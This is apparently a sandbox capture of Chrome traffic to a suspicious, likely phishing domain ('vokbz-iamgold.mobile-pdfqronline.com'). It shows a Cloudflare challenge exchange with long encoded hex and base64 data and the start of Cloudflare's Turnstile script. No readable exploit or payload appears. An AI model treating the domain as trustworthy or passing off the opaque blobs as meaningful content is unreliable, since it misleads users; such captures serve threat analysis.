                                                                                                                                                9192.168.2.1649727188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:36 UTC1349OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/244223768:1730132189:NbzFRZvTcBmmYjVsO5xy0JykfjjXCxNv2Vd8K9KmlQk/8d9c6884aac83168/.dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 4254
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                CF-Challenge: .dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:36 UTC4254OUTData Raw: 76 5f 38 64 39 63 36 38 38 34 61 61 63 38 33 31 36 38 3d 61 53 30 44 24 44 48 44 41 44 32 44 68 44 36 31 57 4e 31 57 77 47 30 78 5a 37 72 74 72 4b 25 32 62 57 36 4d 57 5a 6e 65 53 63 24 57 6a 44 72 53 57 37 69 30 57 75 69 62 57 5a 30 57 67 61 57 37 44 50 47 59 57 50 72 44 57 68 57 76 70 57 4b 24 6f 33 7a 36 63 78 57 56 41 30 57 62 57 67 32 46 30 57 65 57 30 63 6c 57 48 76 6d 6c 57 70 72 33 64 50 57 74 57 74 78 34 79 72 44 50 6a 57 54 44 4b 6a 6c 57 76 57 65 6c 30 63 35 45 38 45 59 4b 4e 51 4e 2d 6a 61 50 44 57 61 76 57 57 4d 31 78 59 50 2b 54 58 66 57 63 69 56 7a 4d 59 50 31 33 72 57 31 2d 72 49 34 2d 30 33 5a 57 57 47 76 65 4b 50 59 47 57 44 70 57 57 34 44 69 6b 78 4c 24 31 77 57 4b 64 39 63 59 62 57 64 30 57 59 59 53 41 47 6a 42 52 7a 37 69 4a 33 31 47
                                                                                                                                                Data Ascii: v_8d9c6884aac83168=aS0D$DHDAD2DhD61WN1WwG0xZ7rtrK%2bW6MWZneSc$WjDrSW7i0WuibWZ0WgaW7DPGYWPrDWhWvpWK$o3z6cxWVA0WbWg2F0WeW0clWHvmlWpr3dPWtWtx4yrDPjWTDKjlWvWel0c5E8EYKNQN-jaPDWavWWM1xYP+TXfWciVzMYP13rW1-rI4-03ZWWGveKPYGWDpWW4DikxL$1wWKd9cYbWd0WYYSAGjBRz7iJ31G
                                                                                                                                                2024-10-28 16:47:37 UTC870INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:36 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 13608
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: bgwWS6qTzoDIAhhFy1urFIbJm0Qc7H6Sec8KQnYgagLf1mpiK2LQRcu/lwmjNQhHc9VK9RURVI0=$/8ftwbdFJmeucZ4I
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhT%2F9bUOe3LwfdIWGID2pZj3lqn4eD%2BtDocFMNEIbllG7K0tAdRrV8WV24VjlkQiiB7zaYI3dFOiNC8SNiAxEXYUhEQ3LI%2FMVNHLZ16X5fN7xburIrtaOPmcANUMwgiZUW3C%2Fnuc8zSG1eYPeVWf9TG4uUAiFHA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c689fda5e3aae-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=4&recv=9&lost=0&retrans=0&sent_bytes=2857&recv_bytes=6225&delivery_rate=2329847&cwnd=251&unsent_bytes=0&cid=97f92e0480978775&ts=178&x=0"
                                                                                                                                                2024-10-28 16:47:37 UTC499INData Raw: 6b 34 61 4d 67 34 2b 59 55 49 4a 68 69 35 75 56 69 35 32 54 6d 70 70 56 56 36 71 74 62 46 4b 71 6e 61 4f 61 70 71 39 6e 6d 5a 5a 73 6d 6e 74 6d 6f 57 68 39 59 37 75 75 74 4b 75 33 77 48 69 71 70 33 36 72 6a 48 65 7a 65 59 35 30 64 58 5a 33 7a 72 72 4d 65 37 76 41 78 4c 37 44 79 63 37 43 78 39 6e 65 68 36 57 4a 79 39 33 54 34 74 76 55 33 75 58 6c 7a 71 54 53 73 59 47 59 6d 5a 71 62 38 74 37 77 6e 2f 50 6d 38 4f 66 57 36 76 66 38 37 66 7a 2b 71 38 6d 74 37 77 4c 33 42 77 44 34 41 77 6f 4b 38 73 6e 32 31 61 57 6d 76 62 36 2f 77 41 73 4a 77 38 77 46 43 67 34 49 44 52 4d 59 44 42 45 6a 4b 4e 37 39 4b 79 63 43 36 39 62 30 39 66 62 61 36 2b 58 64 4f 73 6e 4b 34 65 4c 6a 35 4f 58 6d 35 2b 67 70 4c 6a 49 73 4d 54 63 38 4d 44 56 48 54 50 51 54 39 6c 50 69 2b 66 72
                                                                                                                                                Data Ascii: k4aMg4+YUIJhi5uVi52TmppVV6qtbFKqnaOapq9nmZZsmntmoWh9Y7uutKu3wHiqp36rjHezeY50dXZ3zrrMe7vAxL7Dyc7Cx9neh6WJy93T4tvU3uXlzqTSsYGYmZqb8t7wn/Pm8OfW6vf87fz+q8mt7wL3BwD4AwoK8sn21aWmvb6/wAsJw8wFCg4IDRMYDBEjKN79KycC69b09fba6+XdOsnK4eLj5OXm5+gpLjIsMTc8MDVHTPQT9lPi+fr
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 7a 74 4c 57 32 74 37 67 49 41 77 58 6b 44 64 48 5a 77 42 6b 4d 45 67 6b 56 48 74 55 49 44 52 45 4c 45 42 59 62 44 79 41 69 4a 2b 45 46 4c 77 45 6a 36 74 6e 6e 32 7a 51 6e 4c 53 51 77 4f 66 41 6a 4b 43 77 6d 4b 7a 45 32 4b 6a 73 39 51 76 77 65 51 6b 56 47 42 77 48 66 39 76 66 34 2b 66 72 37 2f 50 33 2b 41 41 45 43 4c 6b 59 76 55 78 63 69 43 57 46 55 57 6c 46 64 5a 68 35 51 56 56 6c 54 57 46 35 6a 56 32 68 71 62 79 70 55 55 30 6c 48 61 6a 49 6a 4d 53 56 39 63 48 5a 74 65 59 49 36 62 48 46 31 62 33 52 36 66 33 4f 45 68 6f 74 47 5a 58 4e 31 69 56 4a 4b 4b 55 42 42 51 6b 4e 45 52 55 5a 48 53 45 6c 4b 53 33 57 55 67 49 6c 69 61 31 4b 71 6e 61 4f 61 70 71 39 6e 6d 5a 36 69 6e 4b 47 6e 72 4b 43 78 73 37 68 7a 71 5a 43 63 73 72 65 77 6e 33 6c 59 62 33 42 78 63 6e
                                                                                                                                                Data Ascii: ztLW2t7gIAwXkDdHZwBkMEgkVHtUIDRELEBYbDyAiJ+EFLwEj6tnn2zQnLSQwOfAjKCwmKzE2Kjs9QvweQkVGBwHf9vf4+fr7/P3+AAECLkYvUxciCWFUWlFdZh5QVVlTWF5jV2hqbypUU0lHajIjMSV9cHZteYI6bHF1b3R6f3OEhotGZXN1iVJKKUBBQkNERUZHSElKS3WUgIlia1KqnaOapq9nmZ6inKGnrKCxs7hzqZCcsrewn3lYb3Bxcn
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 2b 51 73 4e 45 73 77 44 43 51 37 6a 46 41 37 30 47 52 45 51 45 78 6e 58 74 73 33 4f 7a 39 44 52 30 74 50 55 31 64 62 58 32 43 55 75 2f 68 55 50 38 2f 6e 67 4f 53 77 79 4b 54 55 2b 39 53 67 74 4d 53 73 77 4e 6a 73 76 51 45 4a 48 41 6a 67 2b 51 78 6c 4a 51 79 30 2f 4d 77 72 6f 41 41 45 43 41 77 51 46 42 67 63 49 43 51 6f 4c 58 32 46 52 4e 69 59 72 45 6d 70 64 59 31 70 6d 62 79 64 5a 58 6d 4a 63 59 57 64 73 59 48 46 7a 65 44 4e 35 65 32 74 51 51 44 63 57 4c 53 34 76 4d 44 45 79 4d 7a 51 31 4e 6a 63 34 59 47 39 70 6b 6b 31 59 50 35 65 4b 6b 49 65 54 6e 46 53 47 69 34 2b 4a 6a 70 53 5a 6a 5a 36 67 70 57 42 36 69 59 4f 73 5a 32 52 44 57 6c 74 63 58 56 35 66 59 47 46 69 59 32 52 6c 71 72 4b 35 73 4c 46 38 68 6d 33 46 75 4c 36 31 77 63 71 43 74 4c 6d 39 74 37 7a
                                                                                                                                                Data Ascii: +QsNEswDCQ7jFA70GREQExnXts3Oz9DR0tPU1dbX2CUu/hUP8/ngOSwyKTU+9SgtMSswNjsvQEJHAjg+QxlJQy0/MwroAAECAwQFBgcICQoLX2FRNiYrEmpdY1pmbydZXmJcYWdsYHFzeDN5e2tQQDcWLS4vMDEyMzQ1Njc4YG9pkk1YP5eKkIeTnFSGi4+JjpSZjZ6gpWB6iYOsZ2RDWltcXV5fYGFiY2RlqrK5sLF8hm3FuL61wcqCtLm9t7z
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 4d 48 43 77 38 54 46 78 73 66 49 49 41 77 65 7a 43 41 55 4a 4e 44 75 30 74 72 62 38 4d 44 58 32 4e 6e 61 32 39 7a 64 33 74 2f 67 34 65 49 36 4a 6a 6a 6d 4d 79 35 44 46 7a 45 37 37 51 7a 76 50 44 64 4d 41 6b 45 37 52 54 39 4e 51 68 62 37 35 76 33 2b 41 41 45 43 41 77 51 46 42 67 63 49 43 57 42 4d 58 67 31 50 59 57 49 39 56 32 45 55 4d 68 5a 59 61 6d 73 6f 5a 32 46 72 5a 58 4e 6f 50 43 49 4e 4a 43 55 6d 4a 79 67 70 4b 69 73 73 4c 53 34 76 64 6f 43 45 4d 7a 79 4c 64 34 6b 34 67 6e 36 54 50 46 6f 2b 54 31 74 42 69 34 65 63 52 57 4a 48 69 5a 75 63 64 35 47 62 61 55 2b 5a 6c 61 70 65 58 31 35 57 73 6b 4a 5a 57 6c 74 63 58 56 35 66 59 47 46 69 59 32 52 6c 5a 6d 64 6f 75 36 2b 2f 62 48 69 4c 62 37 62 44 77 63 43 58 76 62 66 4a 6d 38 69 2b 77 4a 2b 2b 77 63 66 46
                                                                                                                                                Data Ascii: MHCw8TFxsfIIAwezCAUJNDu0trb8MDX2Nna29zd3t/g4eI6JjjmMy5DFzE77QzvPDdMAkE7RT9NQhb75v3+AAECAwQFBgcICWBMXg1PYWI9V2EUMhZYamsoZ2FrZXNoPCINJCUmJygpKissLS4vdoCEMzyLd4k4gn6TPFo+T1tBi4ecRWJHiZucd5GbaU+ZlapeX15WskJZWltcXV5fYGFiY2RlZmdou6+/bHiLb7bDwcCXvbfJm8i+wJ++wcfF
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 72 78 47 42 45 62 2b 78 41 5a 46 52 51 6d 33 74 4d 59 48 68 6f 73 4d 65 58 61 34 6a 49 77 36 79 67 69 4d 43 63 77 4b 6a 6a 74 38 41 54 54 36 75 76 73 37 65 37 76 38 50 48 79 38 2f 54 31 39 76 66 34 2b 56 67 49 2f 41 38 50 43 52 7a 72 41 77 51 46 42 67 63 49 43 51 6f 4c 44 41 30 4f 57 46 59 5a 61 56 78 69 57 57 56 75 4a 6c 4e 4c 5a 6d 6f 31 4c 45 56 52 53 45 64 75 4e 69 30 74 64 6e 68 35 65 58 32 41 67 6e 78 34 67 34 56 37 64 6b 46 34 68 59 57 4d 67 6f 69 51 66 5a 47 48 6a 6f 35 49 53 30 78 45 6f 44 42 48 53 45 6c 4b 53 30 78 4e 54 6b 39 51 55 56 4a 54 56 46 56 57 72 71 47 6e 6e 71 71 7a 61 37 47 6b 74 4a 57 72 73 4b 6d 30 75 37 74 77 72 37 2b 35 72 38 47 33 76 72 35 35 65 33 50 50 58 33 5a 33 65 48 6c 36 65 33 78 39 66 6e 2b 41 67 59 4b 44 68 49 57 47 68
                                                                                                                                                Data Ascii: rxGBEb+xAZFRQm3tMYHhosMeXa4jIw6ygiMCcwKjjt8ATT6uvs7e7v8PHy8/T19vf4+VgI/A8PCRzrAwQFBgcICQoLDA0OWFYZaVxiWWVuJlNLZmo1LEVRSEduNi0tdnh5eX2Agnx4g4V7dkF4hYWMgoiQfZGHjo5IS0xEoDBHSElKS0xNTk9QUVJTVFVWrqGnnqqza7GktJWrsKm0u7twr7+5r8G3vr55e3PPX3Z3eHl6e3x9fn+AgYKDhIWGh
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 65 48 74 6a 61 30 69 2b 2b 31 64 62 58 32 4e 6e 61 32 39 7a 64 33 74 2f 67 34 65 4c 6a 35 4f 58 6d 35 2b 68 42 4e 44 6f 78 50 55 62 39 51 55 4d 6a 50 69 38 4c 2f 67 45 55 34 2f 72 37 2f 50 33 2b 41 41 45 43 41 77 51 46 42 67 63 49 43 51 70 6f 47 41 30 66 48 79 41 68 47 79 37 39 46 52 59 58 47 42 6b 61 47 78 77 64 48 68 38 67 66 6d 64 76 64 32 71 42 45 53 67 70 4b 69 73 73 4c 53 34 76 4d 44 45 79 4d 7a 51 31 4e 6a 64 37 67 58 32 50 6c 48 68 46 69 6d 46 76 63 31 5a 4c 67 6b 5a 6b 53 46 31 6c 4e 55 78 4e 54 6b 39 51 55 56 4a 54 56 46 56 57 56 31 68 5a 57 6c 75 66 70 61 47 7a 75 4a 78 70 6c 62 71 56 6b 34 6c 2b 63 4b 64 7a 64 56 64 75 62 33 42 78 63 6e 4e 30 64 58 5a 33 65 48 6e 58 5a 58 78 39 66 6e 2b 41 67 59 4b 44 34 59 58 4c 30 39 76 4f 69 75 5a 32 6a 59
                                                                                                                                                Data Ascii: eHtja0i++1dbX2Nna29zd3t/g4eLj5OXm5+hBNDoxPUb9QUMjPi8L/gEU4/r7/P3+AAECAwQFBgcICQpoGA0fHyAhGy79FRYXGBkaGxwdHh8gfmdvd2qBESgpKissLS4vMDEyMzQ1Njd7gX2PlHhFimFvc1ZLgkZkSF1lNUxNTk9QUVJTVFVWV1hZWlufpaGzuJxplbqVk4l+cKdzdVdub3BxcnN0dXZ3eHnXZXx9fn+AgYKD4YXL09vOiuZ2jY
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 4c 42 67 71 32 42 30 6a 4b 43 41 79 4e 39 2f 39 34 53 49 6e 4b 79 55 71 4d 44 55 70 4c 6b 42 46 4b 53 34 7a 4e 7a 45 32 50 45 45 31 4f 6b 78 52 43 43 64 55 55 43 73 56 50 52 7a 72 41 77 51 46 42 67 63 49 43 51 70 68 54 56 38 4f 4f 7a 64 6a 61 6c 63 6b 46 54 4d 58 58 6d 35 6f 58 6e 42 6d 62 57 30 6f 4b 69 4a 2b 44 67 38 6d 4a 79 67 70 4b 69 73 73 4c 53 34 76 4d 44 46 37 65 54 51 39 64 58 4a 33 64 45 74 34 65 54 30 2f 58 46 31 42 53 57 78 38 6d 5a 5a 31 65 47 78 39 55 6b 78 54 56 45 2b 50 6a 4a 47 4f 5a 5a 4b 54 56 31 6c 32 64 31 74 6a 72 49 57 56 75 4b 2b 4a 64 32 74 75 5a 73 4a 53 61 57 70 72 62 47 31 75 62 33 42 78 63 6e 4e 30 64 58 5a 33 65 4d 75 2f 7a 39 48 50 7a 4a 70 71 67 59 4b 44 68 49 57 47 68 34 69 4a 69 6f 75 4d 36 6e 69 50 6b 4a 47 53 6b 35 53
                                                                                                                                                Data Ascii: LBgq2B0jKCAyN9/94SInKyUqMDUpLkBFKS4zNzE2PEE1OkxRCCdUUCsVPRzrAwQFBgcICQphTV8OOzdjalckFTMXXm5oXnBmbW0oKiJ+Dg8mJygpKissLS4vMDF7eTQ9dXJ3dEt4eT0/XF1BSWx8mZZ1eGx9UkxTVE+PjJGOZZKTV1l2d1tjrIWVuK+Jd2tuZsJSaWprbG1ub3BxcnN0dXZ3eMu/z9HPzJpqgYKDhIWGh4iJiouM6niPkJGSk5S
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 41 58 2b 44 7a 51 6f 4c 50 4d 6c 44 78 59 7a 39 79 34 6b 4f 44 4d 55 41 42 5a 4a 49 54 67 56 46 7a 5a 50 49 51 6f 66 4a 53 51 30 46 53 4d 71 56 30 31 56 4f 7a 4e 66 4f 54 49 67 4e 56 56 58 59 53 35 52 53 55 55 36 50 32 31 4c 53 53 78 45 61 45 6f 78 51 6d 68 44 63 53 38 7a 54 56 51 34 53 7a 64 30 61 47 70 4b 51 49 56 33 59 6a 79 4a 55 58 78 44 69 55 68 63 57 49 2b 48 67 57 35 4c 58 6d 69 4f 56 49 2b 45 69 48 56 36 6c 33 64 2b 61 35 39 66 66 70 70 62 59 5a 70 78 59 35 2b 46 61 71 43 72 6e 61 31 74 6b 4a 36 44 66 6d 56 36 53 72 65 6a 74 57 53 6d 67 36 61 72 72 36 6d 75 74 4c 6d 74 73 73 54 4a 72 62 4b 33 75 37 57 36 77 4d 57 35 76 74 44 56 6a 4b 76 59 31 4b 2b 5a 77 61 44 4d 33 4e 62 4d 33 74 54 62 32 34 37 52 6d 4a 72 74 36 74 33 6a 32 75 62 76 70 39 54 4d
                                                                                                                                                Data Ascii: AX+DzQoLPMlDxYz9y4kODMUABZJITgVFzZPIQofJSQ0FSMqV01VOzNfOTIgNVVXYS5RSUU6P21LSSxEaEoxQmhDcS8zTVQ4Szd0aGpKQIV3YjyJUXxDiUhcWI+HgW5LXmiOVI+EiHV6l3d+a59ffppbYZpxY5+FaqCrna1tkJ6DfmV6SrejtWSmg6arr6mutLmtssTJrbK3u7W6wMW5vtDVjKvY1K+ZwaDM3NbM3tTb247RmJrt6t3j2ubvp9TM
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 45 6e 4f 53 38 32 4e 76 44 79 52 6b 4d 32 50 44 4d 2f 53 41 41 74 4a 55 42 45 44 77 59 68 52 6a 78 43 45 51 59 49 44 45 4d 4b 44 42 42 47 46 45 46 55 53 31 30 36 49 79 6f 56 46 68 78 53 49 46 31 4e 53 6b 30 74 4e 53 42 75 5a 47 6c 69 62 58 52 30 4b 43 35 50 53 33 64 2b 61 7a 67 78 4d 34 67 34 63 32 6b 32 64 59 4f 45 67 6f 5a 43 65 58 69 45 68 58 78 38 66 34 68 46 66 46 32 48 6c 35 47 48 6d 59 2b 57 6c 6c 47 52 56 4b 65 66 6b 36 4f 6c 6f 36 42 54 71 35 36 6b 6d 36 65 77 61 4a 57 4e 71 4b 78 33 62 6f 6d 75 70 4b 70 35 62 6e 42 30 71 33 4a 30 65 4b 35 38 71 62 79 7a 78 61 4b 4c 6b 6e 31 2b 68 4c 71 49 78 62 57 79 74 5a 57 64 69 4d 66 56 31 74 54 59 6a 70 54 4b 6d 4e 6d 30 31 62 66 6d 6f 4b 37 5a 6e 38 43 38 36 4f 2f 63 71 61 4b 6b 71 4a 36 66 32 74 33 2b 72
                                                                                                                                                Data Ascii: EnOS82NvDyRkM2PDM/SAAtJUBEDwYhRjxCEQYIDEMKDBBGFEFUS106IyoVFhxSIF1NSk0tNSBuZGlibXR0KC5PS3d+azgxM4g4c2k2dYOEgoZCeXiEhXx8f4hFfF2Hl5GHmY+WllGRVKefk6Olo6BTq56km6ewaJWNqKx3bomupKp5bnB0q3J0eK58qbyzxaKLkn1+hLqIxbWytZWdiMfV1tTYjpTKmNm01bfmoK7Zn8C86O/cqaKkqJ6f2t3+r


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                10192.168.2.1649729104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:37 UTC412OUTGET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:37 UTC471INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:37 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 47672
                                                                                                                                                Connection: close
                                                                                                                                                accept-ranges: bytes
                                                                                                                                                last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68a3192e486e-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:37 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
